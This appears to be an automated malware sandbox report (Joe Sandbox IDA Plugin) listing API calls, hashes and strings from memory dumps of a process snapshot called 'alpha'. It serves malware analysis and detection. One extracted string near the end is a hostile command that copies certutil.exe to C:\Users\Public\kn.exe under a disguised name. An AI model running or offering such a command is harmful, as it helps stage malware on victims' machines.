• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$FullNamePathwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4289998964-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e561addf3608eafd9ded1b77752c08a78dcd93d3eac3eb33e1bac91af3e1d316
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAC1CF21A0D35A86EAA4BB519D6877FA3A0FF45B90F885530CF1E077D5EF3CA5918220
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3476366620-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd8846b952ef2c08dea24ff2da81df1dd8e123bfe33540731bc99edc668aef6a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB21FF64D18B4296EA147B20EC352BAEB50FF5A725FC55275C55E432E1EF3CA4098620
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4104442557-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %9d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1006866328-2241623522
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %5lu
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2448137811-2100233843
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2081463915-1994581435
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1497570035-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _pipe.MSVCRT ref: 00007FF706EB6C1E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EB6CD1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF706EB6CFB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 624391571-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4268342597-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: OpenToken$CloseProcessThread
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2991381754-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF706EDC59E), ref: 00007FF706EB5879
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EB5903
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EB5943
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EB58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706EB5956
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseOpenQueryValueVersion
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %d.%d.%05d.%d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2996790148-3457777122
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2831795651-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00007FF706EB7DA1
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF706EC41AD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF706EB7EB7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 168394030-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9f3d8c2b631c1dc8962f1ee7c420e127b79a65dbb28b44c43e2ed2a06d91cb79
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcb4b5f905d0aebc32b32cc76eff33a3c0356d0c89562b4ffa07b37f6e37bbfa
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6A10621B0874285FB64AB259D712BBA3A1FF84794FC05135DE5E47AE5EF3CE8068320
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InformationQueryToken
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4239771691-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 08e70cfab4faa87b90ea4bedd852458ab3d021e5a2fbb06df466186f17344d7d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C112A76A18781CBEB509F01ED103AAFBA4FB857A6F808531DF4802694DB7DE589CB50
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileInformation$HandleQueryVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2149833895-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 031b29f9c3a5ab169ab6a7436925cea4718c6acc008cdbb9a328edb39569137a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42118C226087C28AE7609B10FD503AFEBA0FB84B98F844131DA9D42A55DBBCD449CB10
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00007FF706EB85D4
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InformationQueryToken
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF706EC93BB
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF706EBF52A,00000000,00000000,?,00000000,?,00007FF706EBE626,?,?,00000000,00007FF706EC1F69), ref: 00007FF706EBF8DE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF8FB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF951
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBF96B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFA8E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EBFB14
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFB2D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706EBFBEA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EBF996
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF706ED849D,?,?,?,00007FF706EDF0C7), ref: 00007FF706EC0045
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF706EDF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF706EDE964), ref: 00007FF706EC0071
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC0092
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF706EC00A7
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF706EC0181
                                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD401
                                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD41B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD435
                                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF706EC1F69,?,?,?,?,?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000), ref: 00007FF706ECD480
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3964947564-518410914
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 437f8b7fcf736409396ac7cc20901e166c58cf944e079e5a2b19de2cf122d3e7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
